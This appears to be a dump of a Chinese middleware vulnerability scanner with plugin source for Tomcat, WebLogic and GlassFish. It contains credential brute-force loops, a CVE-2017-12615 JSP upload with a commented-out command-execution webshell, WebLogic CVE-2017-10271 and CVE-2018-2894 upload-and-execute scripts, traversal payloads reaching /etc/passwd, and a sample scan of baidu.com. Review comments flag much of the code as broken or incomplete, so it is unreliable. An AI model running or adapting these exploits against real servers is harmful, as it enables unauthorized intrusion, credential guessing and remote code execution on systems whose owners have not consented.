24 | 7.struts2
25 | 8.IIS
26 | 9.fastcgi
27 | 10.phpcgi
28 | 11.apache
29 | 12.nginx
30 | 13.spring mvc
31 |
32 |
33 | 借用和拉用了(有些也许没有写到):
34 | axis,glassfish,nginx,iis:
35 | https://github.com/rabbitmask/WeblogicR
36 |
37 |
38 | jboss:
39 | https://github.com/search?l=Python&q=jboss&type=Repositories
40 | https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py
41 |
42 | weblogic:
43 | https://github.com/search?l=Python&q=weblogic&type=Repositories
44 | https://www.exploit-db.com/ :有poc
45 | https://nvd.nist.gov/vuln/detail/CVE-2017-10271
46 | https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
47 | https://github.com/rabbitmask/WeblogicR poc来自这
48 | https://github.com/kingkaki/weblogic-scan
49 |
50 |
51 | tomcat:
52 | https://github.com/search?l=Python&q=tomcat&type=Repositories
53 | https://github.com/SkewwG/VulScan
54 |
55 |
56 | struts2:
57 | https://github.com/search?l=Python&q=struts2&type=Repositories
58 |
59 |
60 | spring:
61 | http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring
62 | https://www.exploit-db.com/ 18年
63 |
64 |
65 |
66 |
67 |
68 |
69 | 3.
70 | 测试例子:
71 | python N-MiddlewareScan.py -u https://www.baidu.com
72 |
73 | 第一部分standard_poc 测试开始:
74 | ***********************
75 | https://www.baidu.com CVE_2018_10661 测试结束
76 | https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成
77 | https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成
78 | https://www.baidu.com/j_security_check?loginButton=Login 测试结束
79 | https://www.baidu.com exist Directory_traversal vuln 测试结束
80 | https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成
81 | https://www.baidu.com/web-console/Invoker 扫描完成
82 | https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成
83 | https://www.baidu.com/admin-console/ 扫描完成
84 | https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成
85 | https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成
86 | https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成
87 | https://www.baidu.com/%20..\web-inf扫描完成
88 | https://www.baidu.com/%3f.jsp扫描完成
89 | https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成
90 |
91 |
92 |
93 | 第一部分 standard_poc 没有测试出任何的漏洞。
94 |
95 |
96 |
97 | 第二部分:
98 | 开始测试特定的poc脚本:
99 | ***********************
100 | 对tomcat weak password 进行检测
101 | CVE_2015_4852 脚本出错
102 | CVE_2016_0638 脚本出错
103 | CVE_2016_3510 脚本出错
104 | CVE_2017_3248 脚本出错
105 | [-]目标weblogic未检测到CVE-2017-3506
106 | CVE_2018_2893 脚本出错
107 | CVE_2018_2628 脚本出错
108 | managerURL200 脚本出错
109 | uddi_ssrf 脚本出错
110 | CVE_2017_12149 检测函数出错
111 | https://www.baidu.com
112 | [36mCode by Lucifer.[0m
113 | [36m-------检测struts2漏洞--------
114 | 目标url:https://www.baidu.com[0m
115 | [32m目标不存在struts2-005漏洞..[0m
116 | [32m目标不存在struts2-009漏洞..[0m
117 | [32m目标不存在struts2-013漏洞..[0m
118 | [36m检测struts2-016超时..[0m
119 | 超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6)
120 | [32m目标不存在struts2-019漏洞..[0m
121 | [36m检测struts2-devmode超时..[0m
122 | 超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6)
123 | [32m目标不存在struts2-032漏洞..[0m
124 | [32m目标不存在struts2-033漏洞..[0m
125 | [32m目标不存在struts2-037漏洞..[0m
126 | [32m目标不存在struts2-045漏洞..[0m
127 | [32m目标不存在struts2-046漏洞..[0m
128 | [32m目标不存在struts2-048漏洞..[0m
129 | [32m目标不存在struts2-020漏洞..[0m
130 | [32m目标不存在struts2-052漏洞..[0m
131 | [32m目标不存在struts2-053漏洞..[0m
132 | [32m目标不存在struts2-057漏洞..(只提供检测)[0m
133 | [-]不存在SpringCVE-2017-8046漏洞!
134 | [-] https://www.baidu.com 不存在IIS PUT上传
135 | Server 不存在 IIS shortname vulnerable
136 | Server 不存在 IIS shortname vulnerable
137 | [-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)
138 |
139 |
140 | 相关漏洞检测完成。
141 |
--------------------------------------------------------------------------------
/plugins/tomcat_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import urllib.request, urllib.error, urllib.parse
3 | import base64
4 | import requests
5 | import uuid
6 | from termcolor import cprint
7 | from urllib.parse import urlparse
8 | from concurrent.futures import ThreadPoolExecutor
9 | import threading
def requests_post(url,username,password,flag_list):
    """Send one Basic-auth POST to ``<url>/manager/html`` and print a hit when a flag matches.

    Args:
        url: base URL.
        username, password: the credential pair to encode.
        flag_list: substrings that identify the manager page.

    NOTE(review): as written this function can never print.  ``user`` (the
    parameter is ``username``), ``res_html`` (the response text lives in
    ``res.text``) and ``config`` (not imported in this module) are all unbound,
    so the first of them raises NameError, which ``except Exception: pass``
    discards.  ``info`` is also only assigned inside the loop and is unbound
    when no flag matches.
    """
    try:
        login_url = url + '/manager/html'
        auth_str_temp = user + ':' + password  # ``user`` is unbound
        auth_str_temp = bytes(auth_str_temp, encoding="utf8")
        auth_str = base64.b64encode(auth_str_temp)
        auth_str = str(auth_str, encoding="utf8")
        headers = {'Authorization': 'Basic ' + auth_str}
        res = requests.post(url=login_url, headers=headers, timeout=config.Timeout)  # ``config`` is unbound
        success_num=0
        for flag in flag_list:
            if flag in res_html:  # ``res_html`` is unbound
                success_num=success_num+1
                info = '%s Tomcat Weak password %s:%s' % (login_url, user, password)
        if success_num>0:
            print(info)
    except Exception:
        pass
def crack_password(arg,config):
    """Try the built-in Tomcat manager credential lists against ``arg.url``.

    Args:
        arg: parsed CLI namespace; ``arg.url`` is the target.
        config: scanner configuration; ``config.ThreadNum`` sizes the executor.

    NOTE(review): ``excetor.submit(requests_post(...))`` evaluates the call on
    the calling thread and hands its ``None`` result to the executor, which
    rejects a non-callable with TypeError — swallowed by the bare ``except``.
    The pool therefore never does any work.  ``url`` (with ``http://``
    prepended) is built but ``arg.url`` is what is passed on, so the scheme
    handling has no effect.
    """
    url = "http://%s"%(arg.url)  # unused: arg.url is passed below instead
    print("对tomcat weak password 进行检测")
    flag_list=['Application Manager','Welcome']
    user_list=['admin','manager','tomcat','apache','root']
    pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root']
    with ThreadPoolExecutor(config.ThreadNum) as excetor:
        for user in user_list:
            for password in pass_list:
                try:
                    excetor.submit(requests_post(arg.url, user, password, flag_list))
                except Exception:
                    pass
41 |
42 |
43 | '''
44 | http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
45 | https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
46 | https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
47 | '''
48 | #脚本来自:https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py
class Exploit:
    """CVE-2017-12615 check: PUT a one-line JSP under a random name and fetch it back."""

    def attack(self, url):
        """Upload ``<uuid>.jsp`` via PUT (trailing-slash variant) and print whether it renders.

        Args:
            url: target; ``http://`` is prepended when the scheme is missing.

        Returns:
            None on every path; the ``return None`` only short-circuits
            non-201 responses.

        NOTE(review): the file written on the target is never removed, so a
        positive result leaves ``<uuid>.jsp`` behind.  The negative branch
        prints with a ``[+]`` prefix and the "(高危)" tag, which reads as a hit;
        it should be ``[-]``.  The commented-out ``body`` above the live one is a
        command-execution page and should stay disabled.  Neither request has a
        timeout, although the ``except`` message reports a connection timeout.
        """
        uu = uuid.uuid4()
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
        }

        # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
        # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(""+excuteCmd(request.getParameter("cmd"))+"");}else{out.println(":-)");}%>'''
        body = '''<%out.print("test");%>'''
        url_parse = urlparse(url)
        url = r'http://' + url if url_parse.scheme == '' else url
        put_url = r'{}/{}.jsp/'.format(url,uu)
        try:
            res = requests.put(put_url,data=body,headers=headers)
            code = res.status_code
            if code == 201:
                print('[+]access : {}'.format(put_url[:-1]))
                access_url = put_url[:-1]
                whoami = requests.get(access_url).text
                if r"test" in whoami:
                    print("[+]存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)\tpayload: " + access_url)
                else:
                    print("[+]不存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)")  # mislabelled: this is the negative branch
            else:
                return None
        except Exception as e:
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
81 |
def tomcat_special_plugin_(arg,config):
    """Entry point for the Tomcat checks: the PUT probe, then the manager credential check.

    Args:
        arg: parsed CLI namespace; ``arg.url`` is the target.
        config: scanner configuration, passed to ``crack_password``.

    NOTE(review): ``threading.Thread(Exploit().attack(arg.url))`` runs the
    probe right here and passes its ``None`` result as the Thread's ``group``;
    no ``target`` is set, so ``start``/``join`` are no-ops and both checks
    execute sequentially on the calling thread.  The intended form is
    ``threading.Thread(target=Exploit().attack, args=(arg.url,))`` and
    ``threading.Thread(target=crack_password, args=(arg, config))``.
    """
    threads=[]
    threads.append(threading.Thread(Exploit().attack(arg.url)))
    threads.append(threading.Thread(crack_password(arg,config)))
    for thread in threads:
        try:
            thread.start()  # no target: returns immediately
        except Exception:
            pass
    for j in threads:
        j.join()
93 |
94 |
--------------------------------------------------------------------------------
/plugins/weblogic_exp/CVE_2017_10271_win.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import requests
12 | import argparse
13 | import time
14 | import base64
15 |
# Module-level request settings read by execute_cmd / weblogic_rce.
# ``proxies`` points at a local interception proxy on 127.0.0.1:8080 and is
# only cleared by ``main()`` when --proxy is not given; importing this module
# and calling the functions directly sends every request through that proxy.
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
timeout = 5  # seconds, applied to every request below
19 | '''
20 | payload的格式化
21 | '''
def payload_command(shell_file,output_file):
    """Read a local file and splice its escaped contents and ``output_file`` into the SOAP template.

    Args:
        shell_file: path of the local file whose contents are embedded.
        output_file: name substituted into the template's first ``{}`` slot.

    Returns:
        The formatted ``payload_1`` string.

    NOTE(review): as reproduced here the escape table maps each key to itself
    (``"&": "&"``), so the "filtering" is a no-op, and the ``'"'`` entry's value
    is written as ``"""``, which Python reads as the start of a triple-quoted
    string — the listing has evidently lost the XML entity strings on the
    right-hand side and is not runnable as shown.  The body of ``payload_1``
    (original lines 39-41 are missing and the rest are blank) is likewise
    absent, so the template formats an empty document.
    """
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
    }
    with open(shell_file) as f:
        shell_context = f.read()
    command_filtered = ""+"".join(html_escape_table.get(c, c) for c in shell_context)+""
    payload_1 = '''








'''.format(output_file,command_filtered)
    return payload_1
47 |
48 | '''
49 | 命令执行
50 | '''
def execute_cmd(target,output_file,command):
    """POST ``command`` to ``/bea_wls_internal/<output_file>`` and return the response text.

    Args:
        target: host[:port] or URL; ``http://`` is prepended when no scheme is given.
        output_file: name of the file written earlier by the payload.
        command: value sent as form field ``c``.

    Returns:
        ``(True, text)`` on HTTP 200; ``(False, reason)`` on 404, any other
        status code, a read timeout, or any other exception.

    NOTE(review): ``except Exception,ex`` is Python 2 syntax; Python 3 — which
    the rest of the scanner uses — refuses to compile this module.  The
    module-level ``proxies`` (127.0.0.1:8080) is used unless ``main`` nulled it.
    """
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    # append a timestamp so the response is not served from a stale cache
    output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time()))
    data = {'c':command}
    try:
        r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout)
        if r.status_code == requests.codes.ok:
            return (True,r.text.strip())
        elif r.status_code == 404:
            return (False,'404 no output')
        else:
            return (False,r.status_code)
    except requests.exceptions.ReadTimeout:
        return (False,'timeout')
    except Exception,ex:
        #raise
        return (False,str(ex))
70 |
71 | '''
72 | RCE:上传命令执行的shell文件
73 | '''
def weblogic_rce(target,cmd,output_file,shell_file):
    """POST the payload from ``payload_command`` to ``/wls-wsat/CoordinatorPortType``; on HTTP 500 call ``execute_cmd``.

    Args:
        target: host[:port] or URL; ``http://`` is prepended when no scheme is given.
        cmd: command forwarded to ``execute_cmd``.
        output_file: file name passed to both ``payload_command`` and ``execute_cmd``.
        shell_file: local file embedded by ``payload_command``.

    Returns:
        The ``(status, text)`` tuple from ``execute_cmd`` after a 500, or
        ``(False, reason)`` for 404, other status codes, a read timeout, and
        any other exception.

    NOTE(review): a 500 is taken as "payload executed" (see the inline comment),
    which is a weak signal — any server-side error yields the same code.
    ``except Exception,ex`` is Python 2 syntax.  ``msg`` is unused, and TLS
    verification is disabled (``verify=False``).
    """
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    url = '{}/wls-wsat/CoordinatorPortType'.format(target)
    # the content-type must be text/xml
    payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
    msg = ''
    try:
        r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies)
        # a 500 is read as "deserialisation happened and the command ran"
        if r.status_code == 500:
            return execute_cmd(target,output_file,cmd)
        elif r.status_code == 404:
            return (False,'404 no vulnerability')
        else:
            return (False,'{} something went wrong'.format(r.status_code))
    except requests.exceptions.ReadTimeout:
        return (False,'timeout')
    except Exception,ex:
        #raise
        return (False,str(ex))
95 |
96 | '''
97 | main
98 | '''
def main():
    """CLI entry point: parse ``-t/-c/-o/-s/--proxy`` and print the result of ``weblogic_rce``.

    NOTE(review): ``print result`` and ``print '[-]FAIL:…'`` are Python 2
    statements, so this file cannot be imported under Python 3 like the rest of
    the scanner.  Without ``--proxy`` the module-level ``proxies`` is nulled
    here, so requests go direct; library callers that skip ``main`` still get
    the 127.0.0.1:8080 proxy.
    """
    global proxies

    parse = argparse.ArgumentParser()
    parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)')
    parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"')
    parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp')
    parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload')
    parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy')
    args = parse.parse_args()

    # proxy only when explicitly requested
    if not args.proxy:
        proxies = None
    status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell)
    #output result:
    if status:
        print result
    else:
        print '[-]FAIL:{}'.format(result)
119 |
120 | if __name__ == '__main__':
121 | main()
122 |
--------------------------------------------------------------------------------
/old_plugins/glassfish.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import requests
3 | from user_agent import get_user_agent
def glassfish_weak1(host):
    """Try the built-in credential list against ``/common/j_security_check`` over HTTPS.

    Args:
        host: host[:port]; ``https://`` is prepended unconditionally.

    Returns:
        ``'YES|<url>/common GlassFish Weak password <user>:<password>'`` on a
        hit, otherwise "/common/j_security_check no exist glassfish weak password".

    NOTE(review): ``requests.post(..., header=headers)`` — the keyword is
    ``headers``; ``requests`` raises TypeError on the unknown argument, the
    inner ``except`` returns the negative message on the very first pair, and
    nothing is ever sent.  This variant uses ``https://`` whereas
    ``glassfish_weak2`` uses ``http://``.  No timeout is set.
    """
    try:
        url = "https://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks',
                     '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"',
                     'src="/header.jsf"', 'Common Tasks', 'title="Logout from GlassFish']
        user_list = ['admin']
        pass_list = ['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888',
                     'admin1', 'administrator', '8888888', '123123', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                try:
                    PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % (
                        user, password)
                    s = requests.post(url + '/common/j_security_check', data=PostStr, header=headers)  # ``header`` is not a requests keyword
                    res_html = s.text
                except Exception:
                    return "/common/j_security_check no exist glassfish weak password"
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s/common GlassFish Weak password %s:%s' % (url, user, password)
                        return 'YES|' + info
        return "/common/j_security_check no exist glassfish weak password"
    except Exception:
        return "/common/j_security_check no exist glassfish weak password"
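def glassfish_weak2(host):
    """Try a short list of default/weak credentials against the GlassFish
    console form login over plain HTTP (``/j_security_check``).

    Args:
        host: host[:port] of the target; ``http://`` is prepended here.

    Returns:
        ``'YES|<url>/index.jsf GlassFish Weak password user:pass'`` for the
        first pair whose response contains one of the console markers,
        otherwise a fixed "no weak password" string (also on any error).
    """
    no_vuln = "no exist index.jsf GlassFish Weak password"
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        # NOTE(review): generic markers such as 'Admin Console' may also be on
        # the login page; confirm against a failed login before trusting a hit.
        flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks',
                     '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"',
                     'src="/header.jsf"', 'src="/index.jsf"', 'Common Tasks',
                     'title="Logout from GlassFish']
        user_list = ['admin']
        pass_list = ['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123',
                     'admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                # Dict body: requests form-encodes it and sets the form
                # Content-Type, which the raw string did not.
                data = {
                    'j_username': user,
                    'j_password': password,
                    'loginButton': 'Login',
                    'loginButton.DisabledHiddenField': 'true',
                }
                try:
                    # Timeout added so one unresponsive host cannot stall the scan.
                    resp = requests.post(url + '/j_security_check?loginButton=Login', data=data,
                                         headers=headers, timeout=10)
                    res_html = resp.text
                except Exception:
                    return no_vuln
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s/index.jsf GlassFish Weak password %s:%s' % (url, user, password)
                        return 'YES|' + info
        return no_vuln
    except Exception:
        return no_vuln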
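def glassfish_Directory_traversal(url):
    """Probe the GlassFish ``/theme/`` handler for the overlong-UTF-8
    (``%c0%af``) path traversal described in the Trustwave advisory below.

    Each probe requests a well-known file through the traversal and looks
    for a content marker (``[fonts]`` for win.ini, the root entry for
    /etc/passwd).

    Args:
        url: full base URL of the target (scheme://host:port).

    Returns:
        ``"exist Directory_traversal vuln"`` on the first marker hit,
        otherwise ``"no exist Directory_traversal vuln"`` (also on error).
    """
    # https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    no_vuln = "no exist Directory_traversal vuln"
    try:
        headers = {'User-Agent': get_user_agent()}
        poc = [
            "/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            # FIX: a comma was missing after this entry, so Python glued the
            # last two literals into one bogus probe and the passwd probe
            # was never sent on its own.
            "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            # FIX: the original read "windows/etc/passwd", a leftover of the
            # win.ini probes; the Linux file lives at etc/passwd.
            "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd",
        ]
        # FIX: a bare "root" (the original marker) matches almost any page;
        # require the actual passwd root entry (Linux and BSD spellings).
        flags = ["[fonts]", "root:x:0:0", "root:*:0:0"]
        for path in poc:
            # FIX: build every probe from the caller's base URL -- the original
            # kept appending to ``url`` so probe N carried probes 1..N-1 in it.
            resp = requests.get(url=url + path, headers=headers, timeout=10)
            if any(marker in resp.text for marker in flags):
                return "exist Directory_traversal vuln"
        return no_vuln
    except Exception:
        return no_vuln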
def glassfish(url):
    """Run the three GlassFish checks in order and print each result line.

    ``url`` is handed unchanged to every check; note that the weak-password
    checks expect a bare host (they prepend a scheme themselves) while the
    traversal check expects a full URL -- the caller has to pick one form.
    """
    for check in (glassfish_weak1, glassfish_weak2, glassfish_Directory_traversal):
        print(check(url))
87 |
88 |
89 |
90 |
--------------------------------------------------------------------------------
/plugins/weblogic_exp/CVE_2018_2894.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import re
12 | import sys
13 | import time
14 | import argparse
15 | import requests
16 | import traceback
17 | import xml.etree.ElementTree as ET
18 |
19 |
def get_current_work_path(host):
    """Read the ws_utc test client's configured work directory from the
    unauthenticated settings endpoint ``/ws_utc/resources/setting/options/general``.

    Parses the XML reply and returns the first ``parameter/defaultValue`` text
    found under ``section/options``.  On a 404, a connection error or an empty
    result the whole process is terminated via ``exit`` (CLI-style code; callers
    cannot recover).

    Args:
        host: base URL (scheme://host:port) of the target.

    Returns:
        The work directory path reported by the server (str).
    """
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        # NOTE(review): this first request is sent without the ``ua`` headers;
        # only the retry below uses them -- probably unintended.
        request = requests.get(geturl)
        if request.status_code == 404:
            exit("[-] {} don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in request.text.lower():
            # The app is deployed lazily on first access; wait and re-fetch.
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            request = requests.get(geturl, headers=ua)
        # NOTE(review): ``"" in request.content`` is always true on Python 2 and
        # a str-in-bytes TypeError on Python 3; the marker looks like it was
        # lost in extraction -- confirm against the upstream script.
        if "" in request.content:
            root = ET.fromstring(request.content)
            value = root.find("section").find("options")
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except requests.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(request.content)
46 |
47 |
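def get_new_work_path(host):
    """Derive the css directory of the deployed ws_utc test-client app from
    the work directory the server currently reports.

    The reported path is expected to contain ``user_projects/domains/<domain>``.
    The domain name is taken from that position and the fixed
    ``servers/AdminServer/tmp/_WL_internal/.../war/css`` suffix appended, using
    the same separator style (``\\`` or ``/``) as the reported path.  If the
    path has no ``user_projects`` segment, or stops before the domain name, it
    is returned unchanged after a warning.

    Args:
        host: base URL of the target (scheme://host:port).

    Returns:
        The derived (or, on failure, the original) path as a str.
    """
    origin_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" not in origin_work_path:
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
        return origin_work_path
    sep = "\\" if "\\" in origin_work_path else "/"
    if sep == "\\":
        works = works.replace("/", "\\")
    prefix = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects" + sep + "domains"
    parts = origin_work_path.split(sep)
    domain_index = len(prefix.split(sep))
    # FIX: the original indexed blindly and raised IndexError when the
    # reported path ended at .../user_projects/domains.
    if domain_index >= len(parts) or not parts[domain_index]:
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
        return origin_work_path
    return prefix + sep + parts[domain_index] + works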
67 |
68 |
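def set_new_upload_path(host, path):
    """Point the ws_utc test client's work directory at ``path`` through the
    unauthenticated settings endpoint so later keystore uploads land there.

    Uses the module-level ``headers`` set in ``__main__``.  Note that this
    persistently changes the target's stored configuration -- record the
    previous value for cleanup.

    Args:
        host: base URL of the target.
        path: new work directory (see ``get_new_work_path``).

    Returns:
        True when the server reports success; otherwise prints the failure
        and terminates the process via ``exit`` with the response body.
    """
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    request = requests.post(host + "/ws_utc/resources/setting/options", data=data,
                            headers=headers, timeout=15)
    # FIX: check the decoded body; ``"successfully" in request.content`` is a
    # str-in-bytes TypeError on Python 3, so success was never detected there.
    if "successfully" in request.text:
        return True
    print("[-] Change New Upload Path failed")
    exit(request.text)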
81 |
82 |
def upload_webshell(host, uri):
    """Redirect the ws_utc work directory into the deployed app's css folder,
    upload a "keystore" file there and fetch it back to confirm it is served.

    Uses the module-level ``password``, ``upload_content`` and ``headers`` set
    in ``__main__``.  Operator note: a successful run leaves
    ``/ws_utc/css/config/keystore/<id>_360sglab.jsp`` on the target and the
    changed work-directory setting in place; both need cleanup.

    Args:
        host: base URL of the target.
        uri: upload endpoint path (``/ws_utc/resources/setting/keystore``).
    """
    set_new_upload_path(host, get_new_work_path(host))
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        # (filename, content) tuple -> sent as a multipart file part.
        "ks_filename": ("360sglab.jsp", upload_content)
    }

    request = requests.post(host + uri, files=files)
    response = request.text
    # NOTE(review): "(.*?)" matches the empty string, so ``tid`` is always '';
    # the tag delimiters around the id look like they were lost in extraction
    # -- confirm the pattern against the upstream script.
    match = re.findall("(.*?)", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
        # NOTE(review): str-in-bytes comparison -- raises TypeError on
        # Python 3 (``.text`` would work on both versions).
        if upload_content in requests.get(shell_path, headers=headers).content:
            print("[+] {} exists CVE-2018-2894".format(host))
            print("[+] Check URL: {} ".format(shell_path))
        else:
            print("[-] {} don't exists CVE-2018-2894".format(host))
    else:
        print("[-] {} don't exists CVE-2018-2894".format(host))
105 |
106 |
if __name__ == "__main__":
    start = time.time()
    # Keystore "password" and the marker content written to the target.  The
    # fixed names make the upload easy to spot on disk and in server logs.
    password = "360sglab"
    url = "/ws_utc/resources/setting/keystore"
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
                        help="target, such as: http://example.com:7001")

    # Plain text, not an executable shell: success is judged solely by the
    # file being served back from the css directory.
    upload_content = "360sglab test"
    # Shared by set_new_upload_path / upload_webshell via module scope.
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }

    # No arguments -> show help instead of silently hitting the default target.
